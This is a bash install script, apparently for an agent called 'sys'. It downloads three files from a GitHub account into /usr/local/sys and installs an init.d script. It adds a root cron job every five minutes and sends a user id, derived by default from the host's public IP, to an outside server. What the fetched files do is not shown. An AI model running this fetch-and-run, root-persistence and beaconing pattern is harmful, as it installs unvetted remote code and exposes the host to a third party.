#!/bin/bash
dirsys=/usr/local/sys
if [ ! -d $dirsys ];then
mkdir -p $dirsys
fi

cd $dirsys

if [ ! -f sysmain ];then
curl -Ls -O https://raw.githubusercontent.com/hankhu666/sys/main/sysmain  -O https://raw.githubusercontent.com/hankhu666/sys/main/assys  -O  https://raw.githubusercontent.com/hankhu666/sys/main/susys && chmod 755 *
mv -u susys /etc/init.d/
sed -i '/assys/d' /var/spool/cron/root
echo '*/5 * * * * /usr/local/sys/assys &> /dev/null' >>/var/spool/cron/root

if read -t 5 -p "input username id:" uid
then
    echo "setusernmae id is: $uid"
else
    echo "autousername id"
    ip=$(curl -s ipv4.ip.sb)
    uid=${ip//./_}
    echo "auto uid：$uid"
fi
sed -i "s/usernameid/$uid/g" ./sysmain
curl  -X POST  https://api.hankhu.xyz/sys/getuid.php -d "$uid" -sk

fi

